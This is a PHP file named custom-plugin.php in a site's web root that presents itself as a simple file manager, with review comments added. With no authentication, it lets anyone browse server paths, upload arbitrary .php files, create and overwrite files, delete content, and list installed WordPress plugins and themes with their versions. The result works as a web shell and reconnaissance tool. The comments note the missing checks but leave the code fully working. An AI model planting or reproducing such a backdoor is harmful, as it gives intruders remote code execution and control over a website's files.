File: /medikors/www/custom-plugin.php
<?php
// Simple PHP File Manager
// Path to manage
// NOTE(review): no authentication, authorization or CSRF check appears anywhere in this
// file; every handler below acts on whatever directory the `path` query parameter names.
$path = isset($_GET['path']) ? $_GET['path'] : '.';
// Normalize and secure the path
// realpath() canonicalises '..' segments and resolves symlinks, but it does not confine the
// result to any base directory, and it returns false for a path that does not exist. None
// of the handlers below test $path for that false value before concatenating it into paths.
$path = realpath($path);
// Helper function to get the size of a directory
/**
 * Total size in bytes of every file found by a recursive walk of $path.
 *
 * @param string|false $path Directory to measure; false, '' or a non-existent path yields 0.
 * @return int Sum of getSize() over all leaf entries (dot entries are skipped).
 */
function getDirectorySize($path) {
    // Same guard as before, written as an early exit: anything that cannot be walked is 0.
    if ($path === false || $path == '' || !file_exists($path)) {
        return 0;
    }
    $walker = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($path, FilesystemIterator::SKIP_DOTS)
    );
    $total = 0;
    foreach ($walker as $entry) {
        $total += $entry->getSize();
    }
    return $total;
}
// Handle file upload
// Handle file upload
// Writes any uploaded file into $path under its client-supplied name. basename() strips
// directory components only: there is no extension, MIME or size check, so executable
// (.php) content is stored as-is. $path is not verified to be a real directory; if realpath()
// returned false the concatenation below yields a root-relative "/<name>".
if(isset($_FILES['file'])){
$upload_path = $path . '/' . basename($_FILES['file']['name']);
// move_uploaded_file() overwrites an existing file of the same name without warning.
if(move_uploaded_file($_FILES['file']['tmp_name'], $upload_path)){
echo "<script>alert('File uploaded successfully!');</script>";
} else {
echo "<script>alert('File upload failed!');</script>";
}
}
// Handle file deletion
// Handle file deletion
// Triggered by a plain GET (?delete=<name>): a state-changing action reachable from any link
// or prefetch, with no POST and no token.
if(isset($_GET['delete'])){
$delete_file = basename($_GET['delete']); // Secure filename
// basename() removes '/' and '..' segments; realpath() then resolves symlinks, so a link
// inside $path that points elsewhere is followed. realpath() returns false for a missing
// target, and both is_file() and is_dir() reject that, landing in the "Deletion failed!" branch.
$delete_path = realpath($path . '/' . $delete_file);
if(is_file($delete_path)){
// Return value of unlink() is not checked; the success alert is shown regardless.
unlink($delete_path);
echo "<script>alert('File deleted successfully!'); window.location.href='?path=" . urlencode($path) . "';</script>";
} elseif(is_dir($delete_path)){
// rmdir() only removes an empty directory; a non-empty one fails (warning) but the
// success alert below is still emitted because the return value is not checked.
rmdir($delete_path);
echo "<script>alert('Directory deleted successfully!'); window.location.href='?path=" . urlencode($path) . "';</script>";
} else {
echo "<script>alert('Deletion failed!');</script>";
}
}
// Handle file editing (saving changes)
// Handle file editing (saving changes)
// Overwrites an existing file in $path with the raw POST field `content`; there is no CSRF
// token, no size limit and no validation of what is written.
if(isset($_POST['save']) && isset($_POST['content']) && isset($_POST['edit_file'])){
$edit_file = basename($_POST['edit_file']); // Secure filename
$edit_path = realpath($path . '/' . $edit_file);
// Unlike the delete handler, the false-from-realpath case is rejected here explicitly,
// and only regular files are accepted as targets.
if($edit_path && is_file($edit_path)) {
// file_put_contents() result is not checked; a failed or partial write still reports success.
file_put_contents($edit_path, $_POST['content']);
echo "<script>alert('File saved successfully!'); window.location.href='?path=" . urlencode($path) . "';</script>";
} else {
echo "<script>alert('Error saving file!');</script>";
}
}
// Handle new PHP file creation
// Handle new PHP file creation
// The whitelist keeps only [A-Za-z0-9_-], so separators and '..' are dropped; a name that is
// entirely filtered out collapses to '' and the file becomes "$path/.php".
if(isset($_POST['create']) && isset($_POST['filename'])){
$filename = preg_replace('/[^a-zA-Z0-9_\-]/', '', $_POST['filename']); // Secure filename
$new_file_path = $path . '/' . $filename . '.php';
// Only existence is checked: neither the validity of $path nor the result of
// file_put_contents() is verified before the success alert.
if(!file_exists($new_file_path)){
file_put_contents($new_file_path, "<?php\n\n// New PHP File\n\n?>");
echo "<script>alert('PHP file created successfully!'); window.location.href='?path=" . urlencode($path) . "';</script>";
} else {
echo "<script>alert('File already exists!');</script>";
}
}
// List files and directories
// List files and directories
// scandir() returns false (with a warning) when $path is false or unreadable; the foreach
// over $files in the template further down does not guard against that.
$files = scandir($path);
// Path segments for the breadcrumb links rendered in the template.
$path_parts = explode(DIRECTORY_SEPARATOR, $path);
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>File Manager</title>
<style>
body { font-family: Arial, sans-serif; background-color: #f0f0f0; color: #333; margin: 0; padding: 20px; }
.file-manager { max-width: 900px; margin: 0 auto; background: #fff; padding: 20px; box-shadow: 0 0 10px rgba(0,0,0,0.1); position: relative; }
.file-manager h1 { margin-top: 0; color: #007bff; }
.path { margin: 10px 0; }
.path a { color: #007bff; text-decoration: none; }
.path a:hover { text-decoration: underline; }
table { width: 100%; border-collapse: collapse; margin-top: 20px; font-size: 14px; }
th, td { padding: 10px; border: 1px solid #ddd; text-align: left; }
th { background-color: #f8f9fa; }
td a { color: #007bff; text-decoration: none; }
td a:hover { text-decoration: underline; }
.editor { margin-top: 20px; }
.editor textarea { width: 100%; height: 300px; padding: 10px; border: 1px solid #ddd; border-radius: 4px; font-family: monospace; }
.upload-form input[type="text"], .upload-form input[type="file"] { margin-right: 10px; padding: 5px; }
.upload-form input[type="submit"] { padding: 5px 15px; border: none; background-color: #28a745; color: #fff; cursor: pointer; border-radius: 4px; }
.upload-form input[type="submit"]:hover { background-color: #218838; }
.recent { background: #ffeeba; }
.suspect { background: #f8d7da; }
.snippet { font-family: monospace; font-size: 12px; color: #555; background: #f6f6f6; padding: 4px; border-radius: 4px; display: block; margin-top: 3px; }
.action-buttons input[type="submit"] { min-width: 120px; }
</style>
</head>
<body>
<div class="file-manager">
<h1>File Manager</h1>
<!-- Display Path -->
<div class="path">
<?php foreach($path_parts as $key => $part): ?>
<?php $current_path = implode(DIRECTORY_SEPARATOR, array_slice($path_parts, 0, $key + 1)); ?>
<a href="?path=<?php echo urlencode($current_path); ?>"><?php echo htmlspecialchars($part); ?></a>
<?php if($key < count($path_parts) - 1): ?>
>
<?php endif; ?>
<?php endforeach; ?>
</div>
<!-- Upload Form -->
<form action="" method="post" enctype="multipart/form-data" class="upload-form">
<input type="file" name="file">
<input type="submit" value="Upload">
</form>
<!-- New PHP File Creation Form -->
<form action="" method="post" class="upload-form">
<input type="text" name="filename" placeholder="Enter file name" required>
<input type="submit" name="create" value="Create PHP File">
</form>
<!-- Check Plugins and Themes Button -->
<form action="" method="post" style="margin-top: 20px; display:inline-block;">
<input type="submit" name="check_wp" value="Check" style="padding: 5px 15px; border: none; background-color: #17a2b8; color: #fff; cursor: pointer; border-radius: 4px;">
</form>
<!-- Security Check Button -->
<form action="" method="post" style="margin-top: 20px; display:inline-block;">
<input type="submit" name="security_check" value="Security Check" style="padding: 5px 15px; border: none; background-color: #dc3545; color: #fff; cursor: pointer; border-radius: 4px; margin-left:10px;">
</form>
<?php
if (isset($_POST['check_wp'])) {
// Function to find wp-content directory upwards
// Declared conditionally, so it only exists on requests that take this branch.
// Walks from $start towards the filesystem root (stops when dirname() no longer changes
// the path) and returns the canonical wp-content path, or false if none is found.
function find_wp_content($start) {
$dir = $start;
while ($dir !== dirname($dir)) {
if (is_dir($dir . '/wp-content')) {
return realpath($dir . '/wp-content');
}
$dir = dirname($dir);
}
return false;
}
$wp_content_path = find_wp_content($path);
// $found is only set when a plugins or themes directory exists, so a wp-content directory
// with neither still reports "No WordPress installation detected".
$found = false;
echo '<div style="margin-top:20px;padding:15px;background:#f8f9fa;border:1px solid #ccc;border-radius:5px;">';
if ($wp_content_path) {
// Plugins
$wp_plugins_path = $wp_content_path . '/plugins';
if (is_dir($wp_plugins_path)) {
echo "<strong>Plugins:</strong><br>";
$plugins = array_diff(scandir($wp_plugins_path), ['.','..']);
$plugin_names = [];
foreach ($plugins as $plugin_folder) {
$plugin_dir = $wp_plugins_path . '/' . $plugin_folder;
if (is_dir($plugin_dir)) {
// Main plugin file: folder-name.php or first .php file
$main_plugin_file = $plugin_dir . '/' . $plugin_folder . '.php';
if (!is_file($main_plugin_file)) {
$php_files = glob($plugin_dir . '/*.php');
$main_plugin_file = $php_files ? $php_files[0] : false;
}
if ($main_plugin_file && is_file($main_plugin_file)) {
// Only the first 8 KiB is read: the plugin header is expected near the top of the file.
$data = file_get_contents($main_plugin_file, false, null, 0, 8192);
if (preg_match('/Plugin Name:\s*(.+)/i', $data, $name) &&
preg_match('/Version:\s*([^\s]+)/i', $data, $version)) {
// Header values come from on-disk files and are escaped before being echoed.
$plugin_name = htmlspecialchars(trim($name[1]));
$plugin_version = htmlspecialchars(trim($version[1]));
// Avoid duplicates
$key = $plugin_name . $plugin_version;
if (!isset($plugin_names[$key])) {
echo $plugin_name . ' <small>(v' . $plugin_version . ')</small><br>';
$plugin_names[$key] = true;
}
}
}
}
}
if (empty($plugin_names)) echo '<em>No plugins found.</em><br>';
$found = true;
}
// Themes
$wp_themes_path = $wp_content_path . '/themes';
if (is_dir($wp_themes_path)) {
echo "<br><strong>Themes:</strong><br>";
$themes = array_diff(scandir($wp_themes_path), ['.','..']);
$theme_names = [];
foreach ($themes as $theme_folder) {
$theme_dir = $wp_themes_path . '/' . $theme_folder;
$style_css = $theme_dir . '/style.css';
if (is_dir($theme_dir) && is_file($style_css)) {
// Same 8 KiB header read as for plugins; themes declare their header in style.css.
$data = file_get_contents($style_css, false, null, 0, 8192);
if (preg_match('/Theme Name:\s*(.+)/i', $data, $name) &&
preg_match('/Version:\s*([^\s]+)/i', $data, $version)) {
$theme_name = htmlspecialchars(trim($name[1]));
$theme_version = htmlspecialchars(trim($version[1]));
// Avoid duplicates
$key = $theme_name . $theme_version;
if (!isset($theme_names[$key])) {
echo $theme_name . ' <small>(v' . $theme_version . ')</small><br>';
$theme_names[$key] = true;
}
}
}
}
if (empty($theme_names)) echo '<em>No themes found.</em><br>';
$found = true;
}
}
if (!$found) {
echo 'No WordPress installation detected (no wp-content directory found upwards from here).';
}
echo '</div>';
}
// SECURITY CHECK BUTTON FUNCTIONALITY
// SECURITY CHECK BUTTON FUNCTIONALITY
// Read-only audit: walks every file below this script's own directory (not $path) and
// tabulates the .php files, flagging ones modified recently or living in directories where
// PHP is not normally expected. Nothing is modified on disk.
if (isset($_POST['security_check'])) {
echo '<div style="margin-top:20px;padding:15px;background:#fff3cd;border:1px solid #ffeeba;border-radius:5px;">';
echo '<strong>Security Check: PHP File Audit</strong><br><br>';
echo '<table><tr><th>File</th><th>Last Modified</th><th>Size</th><th>Snippet</th></tr>';
// Scan recursively for PHP files
$root = dirname(__FILE__); // scan from the script's directory
$now = time();
$recent_days = 7; // highlight files modified in the last 7 days
// Directory names that are matched as whole path components (see the stripos check below).
$suspect_dirs = ['uploads', 'cache', 'backup', 'tmp', 'temp'];
$rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
foreach ($rii as $file) {
if (!$file->isFile()) continue;
$filename = $file->getFilename();
$filepath = $file->getPathname();
// Extension test is case-insensitive on the last four bytes only ('.php', not '.phtml' etc.).
if (strtolower(substr($filename, -4)) === '.php') {
$mtime = $file->getMTime();
$filesize = $file->getSize();
$is_recent = ($now - $mtime < 3600 * 24 * $recent_days);
$is_suspect = false;
foreach ($suspect_dirs as $dir) {
// Wrapping the name in separators restricts the match to a full directory component.
if (stripos($filepath, DIRECTORY_SEPARATOR . $dir . DIRECTORY_SEPARATOR) !== false) {
$is_suspect = true;
break;
}
}
// A suspect location takes precedence over recency for the row highlight.
$row_class = $is_suspect ? 'suspect' : ($is_recent ? 'recent' : '');
echo '<tr class="'.$row_class.'">';
// Path is shown relative to $root and HTML-escaped, since filenames are untrusted.
echo '<td>' . htmlspecialchars(str_replace($root . DIRECTORY_SEPARATOR, '', $filepath)) . ($is_suspect ? ' <b style="color:#c00;">[SUSPECT]</b>' : '') . '</td>';
echo '<td>' . date('Y-m-d H:i:s', $mtime) . ($is_recent ? ' <b style="color:#b58900;">[RECENT]</b>' : '') . '</td>';
echo '<td>' . number_format($filesize) . ' bytes</td>';
// Show snippet
// First five lines (each capped at 4096 bytes), escaped line by line before nl2br().
$snippet = '';
$handle = fopen($filepath, "r");
if ($handle) {
for ($i = 0; $i < 5; $i++) {
$line = fgets($handle, 4096);
if ($line === false) break;
$snippet .= htmlspecialchars($line);
}
fclose($handle);
}
echo '<td><span class="snippet">' . nl2br($snippet) . '</span></td>';
echo '</tr>';
}
}
echo '</table>';
echo '<br><em>Files highlighted as <b>[RECENT]</b> were modified in the last '.$recent_days.' days.<br>Files marked <b>[SUSPECT]</b> are in uploads/cache/backup/tmp/temp folders (unusual for PHP files).</em>';
echo '</div>';
}
?>
<!-- Files Table -->
<table>
<tr>
<th>Name</th>
<th>Size</th>
<th>Actions</th>
</tr>
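<?php foreach($files as $file): ?>
<?php if($file == '.' || $file == '..') continue; ?>
<?php
// Directory entries come straight from scandir() and may contain HTML-significant
// characters; escape once here so both the link text and the plain name are safe.
$file_html = htmlspecialchars($file, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
$entry_path = $path . '/' . $file;
$entry_is_dir = is_dir($entry_path);
?>
<tr>
<td>
<?php if($entry_is_dir): ?>
<a href="?path=<?php echo urlencode($entry_path); ?>"><?php echo $file_html; ?></a>
<?php else: ?>
<?php echo $file_html; ?>
<?php endif; ?>
</td>
<td><?php echo $entry_is_dir ? getDirectorySize($entry_path) . ' bytes' : filesize($entry_path) . ' bytes'; ?></td>
<td>
<a href="?path=<?php echo urlencode($path); ?>&delete=<?php echo urlencode($file); ?>" onclick="return confirm('Delete this file?');">Delete</a>
<?php if(is_file($entry_path)): ?>
<a href="?path=<?php echo urlencode($path); ?>&edit=<?php echo urlencode($file); ?>">Edit</a>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>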
</table>
<!-- File Editor -->
<?php
// Editor panel: loads a file named by the `edit` query parameter into a textarea whose
// POST target is the "save" handler at the top of this file.
if(isset($_GET['edit'])) {
$edit_file = basename($_GET['edit']);
$edit_path = realpath($path . '/' . $edit_file);
// Same acceptance test as the save handler: realpath() must succeed and name a regular file.
if($edit_path && is_file($edit_path)) {
// Whole file is read into memory; there is no size limit.
$content = file_get_contents($edit_path);
?>
<div class="editor">
<h2>Edit File: <?php echo htmlspecialchars($edit_file); ?></h2>
<form action="" method="post">
<textarea name="content"><?php echo htmlspecialchars($content); ?></textarea><br>
<input type="hidden" name="edit_file" value="<?php echo htmlspecialchars($edit_file); ?>">
<input type="submit" name="save" value="Save">
</form>
</div>
<?php }} ?>
</div>
</body>
</html>